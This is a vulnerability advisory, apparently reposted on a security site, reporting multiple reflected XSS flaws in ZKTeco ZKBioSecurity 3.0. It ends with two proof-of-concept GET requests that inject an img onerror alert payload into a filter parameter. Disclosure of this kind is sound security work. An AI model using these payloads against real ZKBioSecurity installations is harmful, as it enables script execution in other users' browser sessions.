ZKTeco ZKBioSecurity 3.0 Multiple XSS Vulnerabilities

Risk: Low
Local: No
Remote: Yes

ZKTeco ZKBioSecurity 3.0 Multiple XSS Vulnerabilities Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd Product web page: http://www.zkteco.com Affected version: Platform: Personnel: Access: Elevator: Visitor: Video: Adms: Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security platform developed by ZKTeco. It contains four integrated modules: access control, video linkage, elevator control and visitor management. With an optimized system architecture designed for high level biometric identification and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced solution for a whole new user experience. Desc: ZKBioSecurity suffers from multiple reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Microsoft Windows 7 Professional SP1 (EN) Apache-Coyote/1.1 Apache Tomcat/7.0.56 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5363 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5363.php 18.07.2016 -- GET /authRoleAction!getAll.action?packageName=auth&un=1468847752607_1814&systemCode=base&pager.posStart=0&pager.pageSize=50&xmlFileName=AuthGroup&filter:authGroupSet.id=1<img%20src%3da%20onerror%3dalert(1)> HTTP/1.1 GET /authUserAction!getAll.action?packageName=auth&un=1468847752607_1814&systemCode=base&pager.posStart=0&pager.pageSize=50&xmlFileName=AuthGroup&filter:authGroupSet.id=1<img%20src%3da%20onerror%3dalert(1)> HTTP/1.1



Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com


Back to Top